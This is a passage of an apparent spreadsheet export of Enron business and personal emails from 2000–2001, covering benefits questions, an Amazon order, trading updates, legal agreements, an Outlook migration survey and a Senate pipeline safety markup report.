Subject: Savings Plan v. 401K_x000D_
_x000D_
I'd like to enroll in the Enron Savings Plan program; however, when I was _x000D_
navigating through the savings plan website, I started wondering if the _x000D_
retirement plan and the self-directed brokerage account are the same thing. I _x000D_
think you probably have some information regarding these plans. Could I _x000D_
borrow that later this afternoon, or even better, sit down with you for a _x000D_
minute to clarify which plans I am eligible to enroll in and when? Thanks in _x000D_
advance for your time._x000D_
_x000D_
Kate_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 09:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ted.bockius@ivita.com'})</t>
  </si>
  <si>
    <t>RE: Monaco</t>
  </si>
  <si>
    <t>You are so photogenic and I'm not :( unhappyness.  But your photos look_x000D_
great.  Perhaps it's the skill of the photographer...wait, I didn't mean_x000D_
that...please keep sending photos._x000D_
_x000D_
-----Original Message-----_x000D_
From: Mark.Taylor@enron.com [mailto:Mark.Taylor@enron.com]_x000D_
Sent: Wednesday, November 29, 2000 4:52 PM_x000D_
To: ted.bockius@ivita.com_x000D_
Subject: Monaco_x000D_
_x000D_
_x000D_
(See attached file: MT Monaco 1.jpg)</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 23:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Your Order with Amazon.com (#107-7339612-5270104)</t>
  </si>
  <si>
    <t>Amazon.com logo	your account_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	Thanks for your order, Eric P. Bass!    _x000D_
	_x000D_
	If you ordered several items to be delivered to the same address, we might _x000D_
send them in separate boxes to ensure quicker service. But don't worry: you _x000D_
won't be charged any extra shipping fees.   _x000D_
	_x000D_
	Thanks again  for shopping with us.   _x000D_
	_x000D_
	Amazon.com  Customer Service _x000D_
	_x000D_
	Manage Your Account:    _x000D_
	  _x000D_
	_x000D_
	Did you know you can view and edit your orders online? Click on Your Account _x000D_
to: _x000D_
	_x000D_
	Track order status   _x000D_
	Combine orders  _x000D_
	Change payment options  _x000D_
	Edit shipping address  _x000D_
	Cancel unshipped items  _x000D_
	Change gift messaging   _x000D_
	do much more...  _x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	  _x000D_
	_x000D_
	Purchasing Information:  _x000D_
	_x000D_
	_x000D_
	_x000D_
	Your  purchase reads as follows:   _x000D_
	_x000D_
	E-mail  Address:??ebass@enron.com   _x000D_
	_x000D_
	_x000D_
	_x000D_
	  Billing Address: ?? _x000D_
	Eric P. Bass_x000D_
	2302 Travis St._x000D_
	#8225_x000D_
	Houston, TX 77006_x000D_
	USA_x000D_
	713.853.0977 _x000D_
	_x000D_
	_x000D_
	_x000D_
	  Subtotal: _x000D_
	  ? _x000D_
	  $   499.99 _x000D_
	  Shipping &amp; Handling:?????????  _x000D_
	  ? _x000D_
	  $    20.96 _x000D_
	_x000D_
	?_x000D_
	------_x000D_
	Total Before Tax: _x000D_
	? _x000D_
	$   520.95 _x000D_
	Tax: _x000D_
	? _x000D_
	$     0.00 _x000D_
	_x000D_
	?_x000D_
	------_x000D_
	Purchase Total: _x000D_
	? _x000D_
	$   520.95 _x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	?  Order Summary: _x000D_
	                          _x000D_
	_x000D_
	Order #1: (Order #107-7339612-5270104) _x000D_
	_x000D_
	Eric Bass_x000D_
	1400 Smith St _x000D_
	Houston, TX  77006_x000D_
	United States_x000D_
	_x000D_
	Shipping method: Next Day Air_x000D_
	Shipping preference: Ship when all items are available.   _x000D_
	_x000D_
	_x000D_
	_x000D_
	[IMAGE]_x000D_
	1 _x000D_
	 "Kodak DC3400 Zoom Digital Camera plus a $100 certificate" _x000D_
	Electronics; @ $499.99 each _x000D_
	Usually available in 24 hours_x000D_
	 _x000D_
	_x000D_
	_x000D_
	You can make changes to any unshipped orders in  Your Account. If you've _x000D_
explored the links on that page but still need to get in touch with us about _x000D_
your order, e-mail us at orders@amazon.com.  _x000D_
	_x000D_
	Thanks again for shopping at Amazon.com!   _x000D_
	_x000D_
	Amazon.com_x000D_
	Earth's Biggest Selection  _x000D_
	_x000D_
	_x000D_
	 _x000D_
	_x000D_
	Some Ideas for Your Next Visit:_x000D_
	 [IMAGE] Kodak Photolife K1000 AA Battery Charging Kit _x000D_
	Our Price: $39.99_x000D_
	 _x000D_
	Kodak Digital Camera Multi-Lens Pack _x000D_
	Our Price: $139.95_x000D_
	 _x000D_
	_x000D_
	[IMAGE] See All Your Recommendations  _x000D_
	unsubscribe icon?Prefer not to receive HTML Mail? Click here_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	Free Shipping_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	?_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	Best of 2000  Our  customers and editors have chosen! Check  out the results. _x000D_
  _x000D_
	_x000D_
	_x000D_
	_x000D_
	?_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	Give the Gift of Choice_x000D_
	Send an Amazon.com gift certificate with one of our free e-cards._x000D_
	_x000D_
	_x000D_
	_x000D_
	?_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	_x000D_
	Create a Wish List And  see what _x000D_
	magic it brings._x000D_
	Click here  for details.  _x000D_
	_x000D_
	_x000D_
	?_x000D_
	_x000D_
	_x000D_
	_x000D_
_x000D_
?_x000D_
?</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 12:44:40 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'j..broderick@enron.com', 'iris.mack@enron.com', 'diana.allen@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'l..day@enron.com', 'hicham.benjelloun@enron.com', 'harry.arora@enron.com', 'dean.laurent@enron.com', 'reese.trejo@enron.com', 'seung-taek.oh@enron.com', 'david.ingram@enron.com', 'joe.quenet@enron.com', 'william.abler@enron.com', 'andrew.greer@enron.com', 'j..sturm@enron.com', 'gustavo.giron@enron.com', 'claudia.guerra@enron.com', 'maria.valdes@enron.com', 'joe.errigo@enron.com', 'e..kelly@enron.com', 'robert.benson@enron.com', 'lisa.shoemake@enron.com', 'jeff.king@enron.com', 'justin.laverell@enron.com', 'utku.gulmeden@enron.com', 'william.freije@enron.com', 'cory.willis@enron.com', 'alexander.mcelreath@enron.com', 'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'chris.lenartowicz@enron.com', 'terri.clynes@enron.com', 'mike.zipperer@enron.com', 'd..thomas@enron.com', 'russell.ballato@enron.com', 'gerald.gilbert@enron.com', 'bill.rust@enron.com', 'joe.capasso@enron.com', 'steve.pan@enron.com', 'anubhav.aggarwal@enron.com', 'benjamin.rogers@enron.com', 'steve.wang@enron.com', 'david.ryan@enron.com', 'clint.dean@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'punit.rawal@enron.com', 'erik.serio@enron.com', 'willis.philip@enron.com', 'jae.black@enron.com', 'daniel.jenkins@enron.com', 'patrick.hanse@enron.com', 'dana.davis@enron.com', '/o=enron/ou=na/cn=recipients/cn=notesaddr/cn=a478079f-55e1f3b0-862566fa-612229@enron.com', 'amie.ha@enron.com', 'corry.bentley@enron.com', 'andy.pace@enron.com', 'mauricio.marquez@enron.com', 'richard.broussard@enron.com', 'ramanarao.tamma@enron.com', 'rika.imai@enron.com', 'jason.kaniss@enron.com', 'erik.simpson@enron.com', 'kevin.cline@enron.com', 'paul.schiavone@enron.com', 'juan.padron@enron.com', 'ted.ballinger@enron.com', 'kayne.coulter@enron.com', 'ashish.mahajan@enron.com', 'jason.choate@enron.com', 'todd.decook@enron.com', 'tom.may@enron.com', 'm..presto@enron.com', 'd..baughman@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'l..garcia@enron.com', 'moises.benchluch@enron.com', 'm..forney@enron.com', 'laurel.bolt@enron.com', 'd..poppa@enron.com', 'robert.stalford@enron.com', 'bryce.schneider@enron.com', 'michael.seely@enron.com', 'doug.sewell@enron.com', 'laura.podurgiel@enron.com', 'clayton.vernon@enron.com', 'jaime.gualy@enron.com', 'gautam.gupta@enron.com', 'joe.stepenovitch@enron.com', 'andy.rodriquez@enron.com', 'gerald.emesih@enron.com', 'jay.blaine@enron.com', 'oscar.dalton@enron.com', 'gretchen.lotz@enron.com', 'larry.valderrama@enron.com', 'f..campbell@enron.com', 'matt.lorenz@enron.com', 'dustin.collins@enron.com', 'ryan.williams@enron.com', 'peter.makkai@enron.com', 'carrie.larkworthy@enron.com', 'alan.chen@enron.com', 'juan.hernandez@enron.com', 'david.maskell@enron.com', 'debra.bailey@enron.com', 'mark.symms@enron.com', 'thomas.lowell@enron.com'})</t>
  </si>
  <si>
    <t>FW: Options Market Update</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Chen, Hai  _x000D_
Sent:	Friday, October 12, 2001 2:35 PM_x000D_
To:	Black, Tamara Jae_x000D_
Subject:	Options Market Update_x000D_
Importance:	High_x000D_
_x000D_
T Jae,_x000D_
_x000D_
Could you forward the followings to all traders and mid-marketers.  Thanks!  - Hai_x000D_
_x000D_
_x000D_
We plan to provide all traders and mid-marketers a weekly update on selected products and activities in options market.  Attached sheet is our first issue, and your comments are much welcome.  _x000D_
_x000D_
We make markets for much more products than the listed.  If you or your customers are interested in any products not available in this sheet, please feel free to contact us directly.  If you don't want to receive this update in the future, please also advise us.  _x000D_
_x000D_
Thanks._x000D_
Hai_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 18 Jun 2001 05:28:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'don.baughman@enron.com', 'm..forney@enron.com', 'juan.hernandez@enron.com', 'kayne.coulter@enron.com'})</t>
  </si>
  <si>
    <t>Ryan Thomas Interview 6/19/01</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
Ryan Thomas will be in our office tomorrow morning to interview for a Real Time trading position on our E. Power 24 hour desk.  Please confirm your availability to interview Ryan:_x000D_
_x000D_
9:00 - 9:30 Don Baughman_x000D_
9:30 - 10:00 Juan Hernandez_x000D_
10:00 - 10:30 Kayne Coulter_x000D_
10:30 - 11:00 John Forney_x000D_
_x000D_
Thanks,_x000D_
Johnny</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2000 05:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Summer</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the draft Purchase and Sale Agreement.  It is highly _x000D_
confidential, and should not be provided to any other individual, including _x000D_
EI management.  I would appreciate your review of the Agreement, and in _x000D_
particular Sections 2.06, 5.06, 5.07, 5.14, 7.03, 9.02, and 9.03.  I would _x000D_
also appreciate your helping to prepare the related Disclosure Schedules.  _x000D_
Attached below is an annotated version of the reps/warranties along with a _x000D_
form of Disclosure Schedule that has been prepared by V&amp;E.  We are asking _x000D_
that drafts of all Schedules be completed by Friday.  Also attached is the _x000D_
latest Matrix of assets.  The plan is to transfer all 700-plus related _x000D_
entities.  Please call with any questions or recommendations.  Thanks for all _x000D_
the help.  Lance.  _x000D_
_x000D_
 _x000D_
 - 00.pdf_x000D_
_x000D_
 - 265022_1.doc_x000D_
 - Summer Disclosure Letter v.2.WPD_x000D_
 - 7.09.00ABC Matrix .xls_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 03:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>American Express/ Sabre NDA</t>
  </si>
  <si>
    <t>Tana_x000D_
_x000D_
If you remember, we have a signed Sabre NDA.  Well now Sabre and Amex have _x000D_
teamed up and this is the new 3 - party NDA.  I am going to Dallas on _x000D_
THursday for a Amex/Sabre meeting.  Can we get comfortable with this NDA by _x000D_
then?_x000D_
_x000D_
ja_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
John Allario_x000D_
Enron Net Works L.L.C._x000D_
713-853-4587 (o)_x000D_
713-562-8684 (c)_x000D_
john.allario@enron.com</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: 2- SURVEY/INFORMATION EMAIL 5-14- 01</t>
  </si>
  <si>
    <t xml:space="preserve">Outlook Migration Team@ENRON_x000D_
05/11/2001 03:49 PM_x000D_
To: Cheryl Wilchynski/HR/Corp/Enron@ENRON, Cindy R Ward/NA/Enron@ENRON, Jo _x000D_
Ann Hill/Corp/Enron@ENRON, Sonja Galloway/Corp/Enron@Enron, Bilal _x000D_
Bajwa/NA/Enron@Enron, Binh Pham/HOU/ECT@ECT, Bradley Jones/ENRON@enronXgate, _x000D_
Bruce Mills/Corp/Enron@ENRON, Chance Rabon/ENRON@enronXgate, Chuck _x000D_
Ames/NA/Enron@Enron, David Baumbach/HOU/ECT@ECT, Jad Doan/ENRON@enronXgate, _x000D_
O'Neal D Winfree/HOU/ECT@ECT, Phillip M Love/HOU/ECT@ECT, Sladana-Anna _x000D_
Kulic/ENRON@enronXgate, Victor Guggenheim/HOU/ECT@ECT, Alejandra _x000D_
Chavez/NA/Enron@ENRON, Anne Bike/Enron@EnronXGate, Carole _x000D_
Frank/NA/Enron@ENRON, Darron C Giron/HOU/ECT@ECT, Elizabeth L _x000D_
Hernandez/HOU/ECT@ECT, Elizabeth Shim/Corp/Enron@ENRON, Jeff _x000D_
Royed/Corp/Enron@ENRON, Kam Keiser/HOU/ECT@ECT, Kimat Singla/HOU/ECT@ECT, _x000D_
Kristen Clause/ENRON@enronXgate, Kulvinder Fowler/NA/Enron@ENRON, Kyle R _x000D_
Lilly/HOU/ECT@ECT, Luchas Johnson/NA/Enron@Enron, Maria Garza/HOU/ECT@ECT, _x000D_
Patrick Ryder/NA/Enron@Enron, Ryan O'Rourke/ENRON@enronXgate, Yuan _x000D_
Tian/NA/Enron@ENRON, Frank Ermis/HOU/ECT@ECT, Jane M Tholt/HOU/ECT@ECT, Jay _x000D_
Reitmeyer/HOU/ECT@ECT, Keith Holst/HOU/ECT@ect, Matthew Lenhart/HOU/ECT@ECT, _x000D_
Mike Grigsby/HOU/ECT@ECT, Monique Sanchez/HOU/ECT@ECT, Phillip K _x000D_
Allen/HOU/ECT@ECT, Randall L Gay/HOU/ECT@ECT, Tori Kuykendall/HOU/ECT@ECT, _x000D_
Ina Norman/HOU/ECT@ECT, Jackie Travis/HOU/ECT@ECT, Michael J _x000D_
Gasper/HOU/ECT@ECT, Brenda H Fletcher/HOU/ECT@ECT, Jeanne _x000D_
Wukasch/Corp/Enron@ENRON, Mary Theresa Franklin/HOU/ECT@ECT, Mike _x000D_
Potter/NA/Enron@Enron, Natalie Baker/HOU/ECT@ECT, Suzanne _x000D_
Calcagno/NA/Enron@Enron, Albert Stromquist/Corp/Enron@ENRON, Rajesh _x000D_
Chettiar/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Derek Anderson/HOU/ECT@ECT, _x000D_
Brad Horn/HOU/ECT@ECT, Camille Gerard/Corp/Enron@ENRON, Cathy _x000D_
Lira/NA/Enron@ENRON, Daniel Castagnola/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Eva Tow/Corp/Enron@ENRON, Lam Nguyen/NA/Enron@Enron, Andy _x000D_
Pace/NA/Enron@Enron, Anna Santucci/NA/Enron@Enron, Claudia _x000D_
Guerra/NA/Enron@ENRON, Clayton Vernon/Corp/Enron@ENRON, David _x000D_
Ryan/Corp/Enron@ENRON, Eric Smith/Contractor/Enron Communications@Enron _x000D_
Communications, Grace Kim/NA/Enron@Enron, Jason Kaniss/ENRON@enronXgate, _x000D_
Kevin Cline/Corp/Enron@Enron, Rika Imai/NA/Enron@Enron, Todd _x000D_
DeCook/Corp/Enron@Enron, Beth Jensen/NPNG/Enron@ENRON, Billi _x000D_
Harrill/NPNG/Enron@ENRON, Martha Sumner-Kenney/NPNG/Enron@ENRON, Phyllis _x000D_
Miller/NPNG/Enron@ENRON, Sandy Olofson/NPNG/Enron@ENRON, Theresa _x000D_
Byrne/NPNG/Enron@ENRON, Danny McCarty/ET&amp;S/Enron@Enron, Denis _x000D_
Tu/FGT/Enron@ENRON, John A Ayres/FGT/Enron@ENRON, John _x000D_
Millar/FGT/Enron@Enron, Julie Armstrong/Corp/Enron@ENRON, Maggie _x000D_
Schroeder/FGT/Enron@ENRON, Max Brown/OTS/Enron@ENRON, Randy _x000D_
Cantrell/GCO/Enron@ENRON, Tracy Scott/Corp/Enron@ENRON, Charles T _x000D_
Muzzy/HOU/ECT@ECT, Cora Pendergrass/Corp/Enron@ENRON, Darren _x000D_
Espey/Corp/Enron@ENRON, Jessica White/NA/Enron@Enron, Kevin _x000D_
Brady/NA/Enron@Enron, Kirk Lenart/HOU/ECT@ECT, Lisa Kinsey/HOU/ECT@ECT, _x000D_
Margie Straight/HOU/ECT@ECT, Mark L Schrab/HOU/ECT@ECT, Souad _x000D_
Mahmassani/Corp/Enron@ENRON, Tammy Gilmore/NA/Enron@ENRON, Teresa _x000D_
McOmber/NA/Enron@ENRON, Wes Dempsey/NA/Enron@Enron, Barry _x000D_
Feldman/NYC/MGUSA@MGUSA, Catherine Huynh/NA/Enron@Enron_x000D_
cc:  _x000D_
Subject: 2- SURVEY/INFORMATION EMAIL 5-14- 01_x000D_
_x000D_
Current Notes User: _x000D_
_x000D_
To ensure that you experience a successful migration from Notes to Outlook, _x000D_
it is necessary to gather individual user information prior to your date of _x000D_
migration.  Please take a few minutes to completely fill out the following _x000D_
survey. Double Click on document to put it in "Edit" mode. When you finish, _x000D_
simply click on the 'Reply With History' button then hit 'Send'  Your survey _x000D_
will automatically be sent to the Outlook 2000 Migration Mailbox._x000D_
_x000D_
Thank you._x000D_
_x000D_
Outlook 2000 Migration Team_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--------------------------------------------------------------_x000D_
_x000D_
Full Name:        Darron Giron_x000D_
_x000D_
Login ID:  dgiron_x000D_
_x000D_
Extension:  3-9573_x000D_
_x000D_
Office Location:  EB3262B_x000D_
_x000D_
What type of computer do you have?  Desktop_x000D_
_x000D_
Do you have a PDA?  If yes, what type do you have:   No_x000D_
_x000D_
Do you have permission to access anyone's Email/Calendar?  No_x000D_
_x000D_
Does anyone have permission to access your Email/Calendar?  Yes, Irena Hogan _x000D_
&amp; Elizabeth Soto_x000D_
_x000D_
Are you responsible for updating anyone else's address book?  No_x000D_
_x000D_
Is anyone else responsible for updating your address book?  No_x000D_
_x000D_
Do you have access to a shared calendar?  No_x000D_
_x000D_
Do you have any Distribution Groups that Messaging maintains for you (for _x000D_
mass mailings)?  No_x000D_
_x000D_
Please list all Notes databases applications that you currently use:  _x000D_
Organizer, Address Book_x000D_
_x000D_
In our efforts to plan the exact date/time of your migration, we also will _x000D_
need to know:_x000D_
_x000D_
What are your normal work hours?  From:8:00am      To:6:30pm_x000D_
_x000D_
Will you be out of the office in the near future for vacation, leave, etc?_x000D_
       If so, when?        From 05/17/01      To 05/18/01_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 27 Dec 2000 05:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Manu Asthana</t>
  </si>
  <si>
    <t>i talked to him last week and we are going to schedule something for next _x000D_
week.</t>
  </si>
  <si>
    <t>Thu, 20 Sep 2001 11:22:24 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'david.delainey@enron.com', 'erin.willis@enron.com', 'john.lavorato@enron.com'})</t>
  </si>
  <si>
    <t>CALIFORNIA UPDATE-9/20/2001</t>
  </si>
  <si>
    <t>_x000D_
For questions or comments regarding this report please contact G. Britt Whitman at ex:5-4014 or Kristin Walsh at ex:3-9510._x000D_
_x000D_
_x000D_
EXECUTIVE SUMMARY:_x000D_
?	CPUC Direct Access Vote_x000D_
_x000D_
CPUC_x000D_
LINK TO ? LIVE WEBCAST of CPUC MEETING 10:00 am -@:pm Sept. 20th &lt;http://www.cpuc.ca.gov/static/announcements/010920_audioaccess.htm&gt;_x000D_
_x000D_
The sun may be setting on Californians' right to customer choice as the CPUC debates the fate of direct access today.  We estimate that at this time, the CPUC commissioners will NOT be taking up the DA issue and will instead delay the vote until after the legislature has convened the third special session, called by Gov. Davis last week.  Currently, both Commissioners Brown and Wood appear unwilling to support DA; with President Lynch being a swing vote.    _x000D_
_x000D_
Concerning the retroactive suspension of direct access agreements of customers who have already elected alternate service providers, the current CPUC position appears to be that direct access contracts signed by September 20th, 2001 will NOT be nullified.  There is rumor that the CPUC may be reviewing several of the contracts signed within the past three to nine months.  Many commercial consumers now operating under DA are highly pessimistic about the CPUC supporting DA agreements that have been signed within the past three months.  The business community is very conscience that the CPUC now bears the difficult task of weighing California businesses' political and economic interests against the economic interests of California's residential power consumers.   _x000D_
_x000D_
REPORTS TO FOLLOW:_x000D_
SoCal Bankruptcy Developments_x000D_
PG&amp;E Emergence from Bankruptcy_x000D_
Probability of Third Special Session for SoCal Bailout</t>
  </si>
  <si>
    <t>Sun, 31 Dec 2000 15:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Daily-Blessings 1/1/01</t>
  </si>
  <si>
    <t>Happy New Year!!_x000D_
_x000D_
Daily-Blessing_x000D_
New Year_x000D_
http://www.daily-blessings.com/newyear.htm_x000D_
_x000D_
Kids vs Adult Vision_x000D_
http://www.daily-blessings.com/kids.htm_x000D_
_x000D_
_x000D_
****Stressed?  tired?  not much time? **** thousands of you have taken_x000D_
advantage of the great relaxation methods offered by this sponsor!_x000D_
I'm sure we've all made resolutions about fitness and relaxation.  As a_x000D_
thank you Daily-Blessings subscribers are being offered a special_x000D_
discount on this site._x000D_
There is a $5 coupon discount for any of the daily-blessings subscribers_x000D_
who purchase this week!!  What better time to try this out..I did..and I_x000D_
love it._x000D_
When you purchase please use the discount code "2001".  Enjoy!!!_x000D_
http://daily-blessings.com/cjtaichi.htm_x000D_
_x000D_
want more coupons the next time you go shopping?  check out this link_x000D_
http://www.daily-blessings.com/orcoolsavings.htm_x000D_
_x000D_
want to know who's calling when you're online?_x000D_
http://www.daily-blessings.com/callwave.htm_x000D_
_x000D_
_x000D_
&lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt;_x000D_
* To remove yourself from this mailing list, point your browser to:_x000D_
http://inbound.postmastergeneral.com/remove?dailyblessings:10_x000D_
* Enter your email address (judy.hernandez@enron.com) in the field_x000D_
provided and click "Unsubscribe". The mailing list ID is "dailyblessings:10"._x000D_
_x000D_
OR..._x000D_
_x000D_
* Reply to this message with the word "remove" in the subject line._x000D_
_x000D_
This message was sent to address judy.hernandez@enron.com_x000D_
X-PMG-Recipient: judy.hernandez@enron.com_x000D_
&lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt;</t>
  </si>
  <si>
    <t>Fri, 21 Dec 2001 13:32:07 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'spmyers@dbh.com', 'dtdoot@dbh.com', 'mgulluni@iso-ne.com'})</t>
  </si>
  <si>
    <t>EES/EPMC/EPMI contact people for NEPOOL</t>
  </si>
  <si>
    <t xml:space="preserve">Maria:  The notice information:_x000D_
_x000D_
Wade Stubblefield (for EES and EEMC)_x000D_
713-345-7464 (phone)_x000D_
713-646-8011 (fax) _x000D_
wade.stubblefield@enron.com_x000D_
_x000D_
Leslie Reeves (for EPMI)_x000D_
phone 713-853-7962_x000D_
fax 713-646-2443_x000D_
cell 713-907-6554; _x000D_
leslie.reeves@enron.com_x000D_
_x000D_
Marcus Nettelton_x000D_
phone 713-345-8161_x000D_
fax  713-646-3393_x000D_
marcus.nettelton@enron.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 06:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Bulletpoint Peaker SPV descriptions</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Don Miller/HOU/ECT on 09/25/2000 01:36 PM _x000D_
---------------------------_x000D_
From: Stuart Zisman on 09/25/2000 01:01 PM_x000D_
To: Don Miller/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Bulletpoint Peaker SPV descriptions_x000D_
_x000D_
Please see attached and let me know if it is not what you wanted._x000D_
_x000D_
Stuart_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 3 Dec 2000 15:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Bio's</t>
  </si>
  <si>
    <t>Hi John!_x000D_
_x000D_
So sorry for the delay in getting these to you this evening---"connectivity" _x000D_
issues...a few monks too few!! (haha)._x000D_
_x000D_
Here are the most current Bio's for Jeff and Ken:_x000D_
_x000D_
._x000D_
_x000D_
I thoroughly enjoyed our dinner this evening and look forward to seeing you _x000D_
tomorrow!_x000D_
_x000D_
Thanks!_x000D_
_x000D_
--Christie.</t>
  </si>
  <si>
    <t>Thu, 15 Jun 2000 08:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'shelley.corman@enron.com', 'stanley.horton@enron.com', 'bob.adams@enron.com', 'louis.soldano@enron.com', 'colleen.raker@enron.com', 'david.johnson@enron.com', 'john.shafer@enron.com', 'phil.lowry@enron.com'})</t>
  </si>
  <si>
    <t>Senate Commerce Committee Pipeline Safety Markup</t>
  </si>
  <si>
    <t>The Senate Commerce Committee held a markup today where Senator John McCain's _x000D_
(R-AZ) pipeline safety legislation, S. 2438, was approved.  The overall _x000D_
outcome was not unexpected -- the final legislation contained several _x000D_
provisions that went a little bit further than Enron and INGAA would have _x000D_
liked, but there was rigorous debate over issues like States' role and _x000D_
mandated integrity measures, and close votes on several amendments.  Senator _x000D_
McCain and other bill proponents like Senator Slade Gorton realize those _x000D_
issues will need to be addressed before the legislation proceeds to the _x000D_
Senate floor._x000D_
_x000D_
The Committee considered several amendments to the legislation:_x000D_
_x000D_
1)  McCain substitute amendment -- Approved by voice vote.   The amendment _x000D_
substituted the revised "Chairman's mark" text that was developed over the _x000D_
last several days in place of the original version of S. 2438.  All further _x000D_
amendments at the markup were in the context of this substitute text._x000D_
_x000D_
2) McCain amendment to Section 13 (b) (on operator assistance investigations) _x000D_
-- Approved by voice vote.  This amendment attempts to fix language in the _x000D_
substitute text that was problematic to just about everyone in industry and _x000D_
on the Hill because it unconstitutionally forced an operator to choose _x000D_
between exercising constitutional rights to protect himself in a criminal _x000D_
investigation or keeping his job.   The McCain amendment did not seem to _x000D_
improve things much, and many Senators could not understand it.  Senator John _x000D_
Breaux (D-LA) objected to it, and asked that the entire section be deleted, _x000D_
and there was some good debate on both sides of the issue.   In the end, _x000D_
McCain asked that the amendment be passed with a promise that he would work _x000D_
with Breaux and others to fix it before Senate floor consideration._x000D_
_x000D_
3)  Sen. John Kerry (D-MA) Amendment on Enforcement -- Approved by voice _x000D_
vote.  Another confusing vote, in which many members did not understand the _x000D_
changes being made, but agreed to it on the condition that clarifications be _x000D_
made before Senate floor action.  Late last night, Enron led a group _x000D_
including companies from INGAA and AGA in providing comments to Senator Kerry _x000D_
which caused him to make substantial changes to his amendment before it was _x000D_
voted on at markup, including dropping provisions allowing citizen suits and _x000D_
other troubling issues.   In the end, the amendment that passed was _x000D_
acceptable to industry._x000D_
_x000D_
4)  Sen. Sam Brownback (R-KS) amendment on Advisory Council Pilot Program -- _x000D_
Rejected 12 to 4.   Brownback's amendment would have replaced the Advisory _x000D_
Council Pilot Program as proposed in the substitute text with a requirement _x000D_
that already existing technical advisory committees to OPS be required to _x000D_
meet regionally.   There was a good debate on the issue, but Senator Gorton _x000D_
made a strong plea to members that the new Advisory Councils would only be a _x000D_
pilot program and would not have any binding role.   He also agreed to work _x000D_
with industry on improvements, such as representation of pipelines on the _x000D_
councils, before Senate floor action._x000D_
_x000D_
5)  Brownback amendment on State Role -- Rejected 10 to 9.   This amendment _x000D_
was written by Enron and El Paso, striking language from the bill that was _x000D_
overly broad in suggesting that a State had oversight authority over "other _x000D_
activities" beyond proper areas like accident investigation, _x000D_
construction-related activities, and inspection.   There was a heated debate, _x000D_
with Brownback and Breaux making excellent arguments for us, but in the end _x000D_
we were 1 vote short.  In fact 2 Democrats switched their votes at the last _x000D_
minute to tip the balance.   I have already had discussions with Senate staff _x000D_
after the markup indicating that this language will need to be fixed to our _x000D_
satisfaction before Senate floor action._x000D_
_x000D_
6)  Sen. Ron Wyden (D-OR) amendment increasing public right-to-know _x000D_
requirements -- Approved by voice vote.   This amendment increases the kinds _x000D_
of information that need to be made widely available to the public.    _x000D_
Because of a state of confusion in which many of the Senators left the room _x000D_
to go vote on the Senate floor, there was no opposition voiced to the _x000D_
